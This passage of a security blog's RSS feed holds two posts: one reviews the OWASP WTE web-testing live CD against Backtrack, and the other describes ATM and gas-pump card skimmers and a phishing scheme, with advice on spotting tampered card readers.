		<description><![CDATA[Just took a look at the new OWASP WTE (Web Testing Environment) Live CD beta. To explain what this is, let me first compare it to the well-known Backtrack Live CD. Backtrack has long been the de-facto standard among live CD-Based security tool collections. Basically, it&#8217;s a CD you boot your system to rather than <a href='http://hackercentric.org/?p=17'>[...]</a>]]></description>
			<content:encoded><![CDATA[<p style="margin-bottom: 0in;">Just took a look at the new OWASP WTE (Web Testing Environment) Live CD beta. To explain what this is, let me first compare it to the well-known Backtrack Live CD. Backtrack has long been the de-facto standard among live CD-based security tool collections. Basically, it&#8217;s a CD you boot your system to rather than the hard drive, loading a Linux-based environment with the security tools installed. The tools range in their functionality from simple reconnaissance tools to port scanners to actual exploits. Backtrack is an invaluable tool to any penetration tester.</p>
<p style="margin-bottom: 0in;">The OWASP WTE Live CD is similar but instead focuses only on web application security. The tools are designed to find vulnerabilities in web applications which could be exploited through the use of such attacks as XSS or SQL Injection, among many others. Web application security is a huge concern lately since a large number of the current attacks are leveled against web applications themselves and the clients that use them. Direct attacks on firewalls or network infrastructures are comparatively in decline these days since the technology protecting networking on lower levels of the OSI model has greatly improved.</p>
<p style="margin-bottom: 0in;"><strong>A New Distro</strong></p>
<p style="margin-bottom: 0in;">The Live CD has been around for some time and was formerly known as the OWASP Live CD, but the name has changed and so has the underlying operating system. The older versions were built on Slax, which has been a long-time favorite of live CD developers over the years because of its tiny profile. However, Ubuntu was probably chosen for many reasons, one of which is that time spent trying to get various hardware drivers to work could instead be spent adding new security tools. Backtrack likewise switched to Ubuntu for version 4.</p>
<p style="margin-bottom: 0in;">What you now get is a nice, crisp desktop with everything working out of the box. You&#8217;d almost forget that it was a security distribution and just start playing with it as you would any other Linux distribution. The authors also provide VMware and VirtualBox images. The advantages of using these over the live CDs are that 1) they are persistent, meaning changes you make, stuff you install, etc. will stay between reboots and 2) you can work with the OWASP WTE while working with your host operating system as well. Heck, fire up Backtrack in a second virtual machine and really have some fun.</p>
<p style="margin-bottom: 0in;"><span><span><img src="http://doulos447.squarespace.com/storage/OWASP.png?__SQUARESPACE_CACHEVERSION=1267187694053" alt="" /></span></span></p>
<p style="margin-bottom: 0in;"><strong>The Tools</strong></p>
<p style="margin-bottom: 0in;">If you&#8217;re not familiar with previous revisions of the OWASP Live CD and you compare it to, say, Backtrack, you might ask “why are there so few tools?” On the current Beta release we see <a href="http://appseclive.org/content/current-tool-list">25 tools</a> listed. (Can you really count Firefox?) While the authors of the CD could answer best as to the seemingly short list of tools, I have some ideas.</p>
<p style="margin-bottom: 0in;">First, remember that this Live CD is focused on Web Application security. Backtrack attempts to include everything dealing with every aspect of information security, from forensics to port scanning. It&#8217;s a fairly complete collection, but as a pen tester you really only need a small subset of these tools, and if your focus is on Web Application security, your tool list becomes even shorter. You learn to sharpen your skills with a few really good tools and ignore the rest if they provide no other functionality. Backtrack has a tendency to be rather repetitive with its tools. How many port scanners do you really need?</p>
<p style="margin-bottom: 0in;">Second, remember that web application security is only now coming of age. Knowing that this is where the risks are, we are only now, in the last few years, starting to see the emergence of good testing tools. Perhaps this is a call to developers to provide us with even more such tools.</p>
<p style="margin-bottom: 0in;">However, it should be pointed out that <a href="http://appseclive.org/content/upcoming-livecd-changes">more tools are on the way</a>. This is a very fluid project. Now, thanks to the use of Ubuntu, more work can be done to produce such packages. Also, keep in mind that with the virtualized versions of the OWASP WTE (or versions installed on a USB drive or directly on the hard drive) you have the freedom to add your own tools.</p>
<p style="margin-bottom: 0in;">The tools included on the Live CD represent the best of the available open source security tools for web application testing. Reconnaissance tools, fuzzers, proxies, and even automated vulnerability testers such as W3AF are standard gear. Also included are some of the basic pen testing tools such as nmap, wireshark, and netcat.</p>
<p style="margin-bottom: 0in;"><strong>Recommendations</strong></p>
<p style="margin-bottom: 0in;">Some of these may already be in the works, and others may be nit-picking, but that&#8217;s my nature.</p>
<ol>
<li>
<p style="margin-bottom: 0in;">It&#8217;s a security distribution. We need a dark theme with a flame job and some voice as a startup sound. Maybe James Earl Jones saying “You&#8217;ve been Pwned!” Seriously though, I loved the wasp from the previous versions of the Live CD. It really stood out. The current look, however, is very clean and nice. No major complaints.</p>
</li>
<li>
<p style="margin-bottom: 0in;">Firefox is installed, but what&#8217;s missing are all the cool plug-ins related to application security like Tamper Data. Even the web developer plug-in would be useful to have. (Ok, scratch this one. Included on the Live CD is a launcher for “Firefox OWASP Style” with all the plugins. We all have our idiot moments. Hey, I just realized, with the small readership I have, I could have deleted this point and nobody would have been the wiser. Oh well&#8230;)</p>
</li>
</ol>
<p style="margin-bottom: 0in;">So the only real recommendation I have at this point is James Earl Jones.  That&#8217;s what you get with a preliminary look. <img src='http://hackercentric.org/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p style="margin-bottom: 0in;"><strong>Conclusions</strong></p>
<p style="margin-bottom: 0in;">The OWASP WTE Live CD is a work in progress, but I am very impressed thus far. I am happy to see it move to an Ubuntu platform as it will open up a whole new realm of tools and packaging possibilities. I look forward to its future development and the new tools being added.</p>
<p style="margin-bottom: 0in;">OWASP WTE Live CD Website: <a href="http://appseclive.org/">http://appseclive.org</a></p>
<p style="margin-bottom: 0in;">Backtrack: <a href="http://www.backtrack-linux.org/">http://www.backtrack-linux.org/</a></p>
<p>One last note: The Appseclive.org website has a lot of good information and articles pertaining to application security. Take some time to peruse their material.</p>
]]></content:encoded>
			<wfw:commentRss>http://hackercentric.org/?feed=rss2&amp;p=17</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Skimming at the Pump</title>
		<link>http://hackercentric.org/?p=15</link>
		<comments>http://hackercentric.org/?p=15#comments</comments>
		<pubDate>Mon, 19 Apr 2010 01:48:07 +0000</pubDate>
		<dc:creator>dhughes</dc:creator>
				<category><![CDATA[Physical Security]]></category>

		<guid isPermaLink="false">http://hackercentric.org/?p=15</guid>
		<description><![CDATA[Some time ago I was fascinated by the story of how criminals were stealing credit card information from ATM machines in California by creating a fake, intermediate entry point for the credit/debit card. A device which, for all practical purposes, looked like the slot where the credit card should be inserted, was placed over the <a href='http://hackercentric.org/?p=15'>[...]</a>]]></description>
			<content:encoded><![CDATA[<p>Some time ago I was fascinated by the story of how criminals were stealing credit card information from ATM machines in California by creating a fake, intermediate entry point for the credit/debit card. A device which, for all practical purposes, looked like the slot where the credit card should be inserted, was placed over the slot. However, this device was set up to read the information on the credit card stripe in the same manner that the ATM machine would. So, the card is inserted and passes the first, fake device before continuing on into the machine. The ATM works as expected to the customer, who does not notice the addition of the outer device. Keep in mind, the devices were designed to aesthetically blend in with the surrounding ATM. Of course, the criminals needed the customer&#8217;s PIN as well, so a small video camera was mounted in an upper corner of the ATM where it would not be noticed by the victims.</p>
<p>In a rash of similar attacks in Utah, criminals are now placing skimming devices within &#8220;Pay-at-the-Pump&#8221; gas pumps. You can read the full story <a href="http://www.darkreading.com/database_security/security/attacks/showArticle.jhtml?articleID=223100233">here</a>. The way this seems to work is that a device is placed within the gas pump, skimming the credit card numbers as was done with the ATM machines. The data is transmitted via Bluetooth to a nearby device to be collected later by the attacker.</p>
<p>How an attacker gains access to the &#8220;inside&#8221; of a gas pump is beyond me. Some are speculating it is an inside job while others say that these pumps are physically vulnerable. Whatever the method, the fact that these reside within the pump makes it all the more difficult to detect, especially for the victim.</p>
<p>These two types of attacks remind me of similar phishing methods used by online attackers. A victim receives an email from his bank and is told that his account has been compromised. He clicks the link to log in to his account and is greeted by the familiar login page. However, this page does not reside on his bank&#8217;s web server. Instead, it resides on the attacker&#8217;s server somewhere in Russia. All the other links on the page do as expected and take him to actual links on his bank page. However, the button he clicks to log in sends his credentials to the attacker&#8217;s database. The attacker&#8217;s page will then redirect him to his actual bank login page. What does the victim think? He must have simply put in the wrong password. He tries again, and he&#8217;s in his account. All this transpired without the victim realizing his credentials were stolen. The fake page was designed in the same way as the fake ATM card slot, and the clever attacker allows the victim&#8217;s login to finally achieve what the victim wants&#8211;access to his account. The attacker does not want to cause disruption to the process that would direct unwanted attention to himself.</p>
<p>While newsworthy, neither of these skimming attacks is commonplace. Setting them up would involve quite a lot of risk. I would say that you are just as vulnerable to having your credit card information stolen by your waiter at a restaurant who walks off with it for 15 minutes as you are by a credit card skimmer. However, let us still show a bit more caution whenever we swipe that card. Does the device look tampered with? Perhaps it looks newer than its surrounding enclosure? Do you remember that ATM card slot being so big? Are the other ATMs the same in appearance? If the answer to any of these questions causes reasonable suspicion, then we should be discussing our concerns with the owners of the equipment.</p>
<p>David H.</p>
]]></content:encoded>
			<wfw:commentRss>http://hackercentric.org/?feed=rss2&amp;p=15</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
